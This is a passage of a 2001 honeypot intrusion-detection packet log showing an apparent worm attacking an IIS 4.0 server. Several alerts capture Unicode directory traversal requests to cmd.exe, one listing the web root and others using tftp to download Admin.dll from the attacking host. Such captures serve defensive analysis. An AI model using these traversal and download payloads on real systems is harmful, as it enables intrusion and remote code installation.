2C /4.0..Date: Tue, 040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16: 050 : 30 34 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 04:15 GMT..Conte 060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht 070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng 080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C th: 100....<html 090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72 ><head><title>Er 0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 ror</title></hea 0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63 d><body>The spec 0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75 ified module cou 0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E ld not be found. 0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E </body></html> ---------------------------------------------------------------------------- -- #(2 - 25389) [2001-09-18 10:20:34] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=26372 flags=0 offset=0 TTL=128 chksum=58006 TCP: port=80 -> dport: 2154 flags=***A***F seq=486539 ack=478595622 off=5 res=0 win=8684 urp=0 chksum=32953 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25390) [2001-09-18 10:20:34] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=10559 flags=0 offset=0 TTL=118 chksum=10844 TCP: port=2154 -> dport: 80 flags=*****R** seq=478595622 ack=0 off=5 res=0 win=0 urp=0 chksum=3909 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25391) [2001-09-18 10:20:34] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=10815 flags=0 offset=0 TTL=118 chksum=10584 TCP: port=2248 -> dport: 80 flags=******S* seq=478596387 ack=0 off=6 res=0 win=8192 urp=0 chksum=54319 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25392) [2001-09-18 10:20:34] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=27396 flags=0 offset=0 TTL=128 chksum=56978 TCP: port=80 -> dport: 2248 flags=***A**S* seq=487511 ack=478596388 off=6 res=0 win=8760 urp=0 chksum=24968 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25393) [2001-09-18 10:20:34] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=11327 flags=0 offset=0 TTL=118 chksum=26460 TCP: port=2154 -> dport: 80 flags=*****R** seq=478595622 ack=478595622 off=5 res=0 win=0 urp=0 chksum=10392 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25394) [2001-09-18 10:20:35] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=9536 flags=0 offset=0 TTL=119 chksum=11611 TCP: port=2248 -> dport: 80 flags=***A**** seq=478596388 ack=487512 off=5 res=0 win=8760 urp=0 chksum=31045 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25395) [2001-09-18 10:20:38] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=157 ID=21314 flags=0 offset=0 TTL=119 chksum=65251 TCP: port=2248 -> dport: 80 flags=***AP*** seq=478596388 ack=487512 off=5 res=0 win=8760 urp=0 chksum=30371 Payload: length = 111 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ---------------------------------------------------------------------------- -- #(2 - 25396) [2001-09-18 10:20:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=231 ID=30212 flags=0 offset=0 TTL=128 chksum=53975 TCP: port=80 -> dport: 2248 flags=***AP*** seq=487512 ack=478596505 off=5 res=0 win=8643 urp=0 chksum=9103 Payload: length = 191 000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso 020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date 030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20 040 : 30 31 20 31 36 3A 30 34 3A 31 38 20 47 4D 54 0D 01 16:04:18 GMT. 050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a 060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet 070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume 080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n 090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume 0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i 0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA.... ---------------------------------------------------------------------------- -- #(2 - 25397) [2001-09-18 10:20:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=564 ID=30468 flags=0 offset=0 TTL=128 chksum=53386 TCP: port=80 -> dport: 2248 flags=***AP**F seq=487703 ack=478596505 off=5 res=0 win=8643 urp=0 chksum=21986 Payload: length = 524 000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C: 010 : 5C 49 6E 65 74 70 75 62 5C 77 77 77 72 6F 6F 74 \Inetpub\wwwroot 020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 ....09/18/01 10 030 : 3A 35 34 61 20 20 20 20 20 20 20 20 3C 44 49 52 :54a <DIR 040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09 050 : 2F 31 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 /18/01 10:54a 060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR> 070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0 080 : 31 20 20 31 30 3A 35 34 61 20 20 20 20 20 20 20 1 10:54a 090 : 20 3C 44 49 52 3E 20 20 20 20 20 20 20 20 20 20 <DIR> 0a0 : 63 67 69 2D 62 69 6E 0D 0A 30 39 2F 31 38 2F 30 cgi-bin..09/18/0 0b0 : 31 20 20 31 30 3A 35 34 61 20 20 20 20 20 20 20 1 10:54a 0c0 : 20 20 20 20 20 20 20 20 20 20 34 2C 36 36 33 20 4,663 0d0 : 64 65 66 61 75 6C 74 2E 61 73 70 0D 0A 30 39 2F default.asp..09/ 0e0 : 31 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 20 18/01 10:54a 0f0 : 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 20 <DIR> 100 : 20 20 20 20 69 6D 61 67 65 73 0D 0A 30 39 2F 31 images..09/1 110 : 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 20 20 8/01 10:54a 120 : 20 20 20 20 20 20 20 20 20 20 20 20 20 32 2C 35 2,5 130 : 30 34 20 70 6F 73 74 69 6E 66 6F 2E 68 74 6D 6C 04 postinfo.html 140 : 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 3A 35 ..09/18/01 10:5 150 : 34 61 20 20 20 20 20 20 20 20 3C 44 49 52 3E 20 4a <DIR> 160 : 20 20 20 20 20 20 20 20 20 5F 70 72 69 76 61 74 _privat 170 : 65 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 3A e..09/18/01 10: 180 : 35 34 61 20 20 20 20 20 20 20 20 20 20 20 20 20 54a 190 : 20 20 20 20 31 2C 37 35 39 20 5F 76 74 69 5F 69 1,759 _vti_i 1a0 : 6E 66 2E 68 74 6D 6C 0D 0A 20 20 20 20 20 20 20 nf.html.. 1b0 : 20 20 20 20 20 20 20 20 38 20 46 69 6C 65 28 73 8 File(s 1c0 : 29 20 20 20 20 20 20 20 20 20 20 38 2C 39 32 36 ) 8,926 1d0 : 20 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 bytes.. 1e0 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 1f0 : 20 20 32 2C 31 30 30 2C 38 38 33 2C 34 35 36 20 2,100,883,456 200 : 62 79 74 65 73 20 66 72 65 65 0D 0A bytes free.. ---------------------------------------------------------------------------- -- #(2 - 25398) [2001-09-18 10:20:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=30274 flags=0 offset=0 TTL=118 chksum=56664 TCP: port=2248 -> dport: 80 flags=*****R** seq=478596505 ack=0 off=5 res=0 win=0 urp=0 chksum=2932 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25399) [2001-09-18 10:20:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=30530 flags=0 offset=0 TTL=118 chksum=56404 TCP: port=2610 -> dport: 80 flags=******S* seq=478856437 ack=0 off=6 res=0 win=8192 urp=0 chksum=56047 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25400) [2001-09-18 10:20:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=30724 flags=0 offset=0 TTL=128 chksum=53650 TCP: port=80 -> dport: 2610 flags=***A**S* seq=491256 ack=478856438 off=6 res=0 win=8760 urp=0 chksum=22951 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25401) [2001-09-18 10:20:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=30786 flags=0 offset=0 TTL=118 chksum=7001 TCP: port=2248 -> dport: 80 flags=*****R** seq=478596505 ack=478596505 off=5 res=0 win=0 urp=0 chksum=8532 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25402) [2001-09-18 10:20:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=37442 flags=0 offset=0 TTL=119 chksum=49240 TCP: port=2610 -> dport: 80 flags=***A**** seq=478856438 ack=491257 off=5 res=0 win=8760 urp=0 chksum=29028 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25403) [2001-09-18 10:20:38] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=212 ID=37698 flags=0 offset=0 TTL=119 chksum=48812 TCP: port=2610 -> dport: 80 flags=***AP*** seq=478856438 ack=491257 off=5 res=0 win=8760 urp=0 chksum=13294 Payload: length = 156 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 tftp -i 65.29.24 050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 3.180 GET Admin. 060 : 64 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C dll c:\Admin.dll 070 : 20 25 32 30 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C %20c:\Admin.dll 080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host: 090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne ---------------------------------------------------------------------------- -- #(2 - 25404) [2001-09-18 10:20:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=30980 flags=0 offset=0 TTL=128 chksum=53043 TCP: port=80 -> dport: 2610 flags=***AP*** seq=491257 ack=478856610 off=5 res=0 win=8588 urp=0 chksum=2336 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 34 3A 31 39 20 47 4D 54 0D 0A 43 6F 6E 74 :04:19 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25405) [2001-09-18 10:20:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=31236 flags=0 offset=0 TTL=128 chksum=53142 TCP: port=80 -> dport: 2610 flags=***A***F seq=491612 ack=478856610 off=5 res=0 win=8588 urp=0 chksum=28672 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25406) [2001-09-18 10:20:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=46914 flags=0 offset=0 TTL=118 chksum=40024 TCP: port=2610 -> dport: 80 flags=*****R** seq=478856610 ack=0 off=5 res=0 win=0 urp=0 chksum=4605 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25407) [2001-09-18 10:20:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=47170 flags=0 offset=0 TTL=118 chksum=39764 TCP: port=2637 -> dport: 80 flags=******S* seq=478856730 ack=0 off=6 res=0 win=8192 urp=0 chksum=55727 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25408) [2001-09-18 10:20:39] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=31492 flags=0 offset=0 TTL=128 chksum=52882 TCP: port=80 -> dport: 2637 flags=***A**S* seq=491757 ack=478856731 off=6 res=0 win=8760 urp=0 chksum=22130 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25409) [2001-09-18 10:20:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=47426 flags=0 offset=0 TTL=118 chksum=55896 TCP: port=2610 -> dport: 80 flags=*****R** seq=478856610 ack=478856610 off=5 res=0 win=0 urp=0 chksum=12240 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25410) [2001-09-18 10:20:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=59714 flags=0 offset=0 TTL=119 chksum=26968 TCP: port=2637 -> dport: 80 flags=***A**** seq=478856731 ack=491758 off=5 res=0 win=8760 urp=0 chksum=28207 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25411) [2001-09-18 10:20:39] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=212 ID=59970 flags=0 offset=0 TTL=119 chksum=26540 TCP: port=2637 -> dport: 80 flags=***AP*** seq=478856731 ack=491758 off=5 res=0 win=8760 urp=0 chksum=12217 Payload: length = 156 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 tftp -i 65.29.24 050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 3.180 GET Admin. 060 : 64 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C dll d:\Admin.dll 070 : 20 25 32 30 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C %20d:\Admin.dll 080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host: 090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne ---------------------------------------------------------------------------- -- #(2 - 25412) [2001-09-18 10:20:39] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=31748 flags=0 offset=0 TTL=128 chksum=52275 TCP: port=80 -> dport: 2637 flags=***AP*** seq=491758 ack=478856903 off=5 res=0 win=8588 urp=0 chksum=1268 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 34 3A 32 30 20 47 4D 54 0D 0A 43 6F 6E 74 :04:20 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25413) [2001-09-18 10:20:39] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=32004 flags=0 offset=0 TTL=128 chksum=52374 TCP: port=80 -> dport: 2637 flags=***A***F seq=492113 ack=478856903 off=5 res=0 win=8588 urp=0 chksum=27851 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25414) [2001-09-18 10:20:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=22595 flags=0 offset=0 TTL=118 chksum=64343 TCP: port=2637 -> dport: 80 flags=*****R** seq=478856903 ack=0 off=5 res=0 win=0 urp=0 chksum=4285 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25415) [2001-09-18 10:20:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=24131 flags=0 offset=0 TTL=118 chksum=13656 TCP: port=2637 -> dport: 80 flags=*****R** seq=478856903 ack=478856903 off=5 res=0 win=0 urp=0 chksum=11627 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25418) [2001-09-18 10:20:42] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=37445 flags=0 offset=0 TTL=118 chksum=49489 TCP: port=2735 -> dport: 80 flags=******S* seq=478857651 ack=0 off=6 res=0 win=8192 urp=0 chksum=54708 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25419) [2001-09-18 10:20:42] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=34564 flags=0 offset=0 TTL=128 chksum=49810 TCP: port=80 -> dport: 2735 flags=***A**S* seq=495592 ack=478857652 off=6 res=0 win=8760 urp=0 chksum=17276 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25420) [2001-09-18 10:20:43] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=31302 flags=0 offset=0 TTL=119 chksum=55380 TCP: port=2735 -> dport: 80 flags=***A**** seq=478857652 ack=495593 off=5 res=0 win=8760 urp=0 chksum=23353 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25421) [2001-09-18 10:20:43] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=212 ID=31558 flags=0 offset=0 TTL=119 chksum=54952 TCP: port=2735 -> dport: 80 flags=***AP*** seq=478857652 ack=495593 off=5 res=0 win=8760 urp=0 chksum=7107 Payload: length = 156 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 tftp -i 65.29.24 050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 3.180 GET Admin. 060 : 64 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C dll e:\Admin.dll 070 : 20 25 32 30 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C %20e:\Admin.dll 080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host: 090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne ---------------------------------------------------------------------------- -- #(2 - 25422) [2001-09-18 10:20:43] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=35076 flags=0 offset=0 TTL=128 chksum=49302 TCP: port=80 -> dport: 2735 flags=***A**** seq=495593 ack=478857824 off=5 res=0 win=8588 urp=0 chksum=23353 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25528) [2001-09-18 10:21:36] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=34054 flags=0 offset=0 TTL=128 chksum=49969 TCP: port=80 -> dport: 2735 flags=***AP*** seq=495593 ack=478857824 off=5 res=0 win=8588 urp=0 chksum=61943 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 35 3A 31 36 20 47 4D 54 0D 0A 43 6F 6E 74 :05:16 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25529) [2001-09-18 10:21:36] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=34310 flags=0 offset=0 TTL=128 chksum=50068 TCP: port=80 -> dport: 2735 flags=***A***F seq=495948 ack=478857824 off=5 res=0 win=8588 urp=0 chksum=22997 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25530) [2001-09-18 10:21:36] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=13937 flags=0 offset=0 TTL=118 chksum=7466 TCP: port=2735 -> dport: 80 flags=*****R** seq=478857824 ack=0 off=5 res=0 win=0 urp=0 chksum=3266 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25531) [2001-09-18 10:21:36] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=14193 flags=0 offset=0 TTL=118 chksum=7206 TCP: port=3967 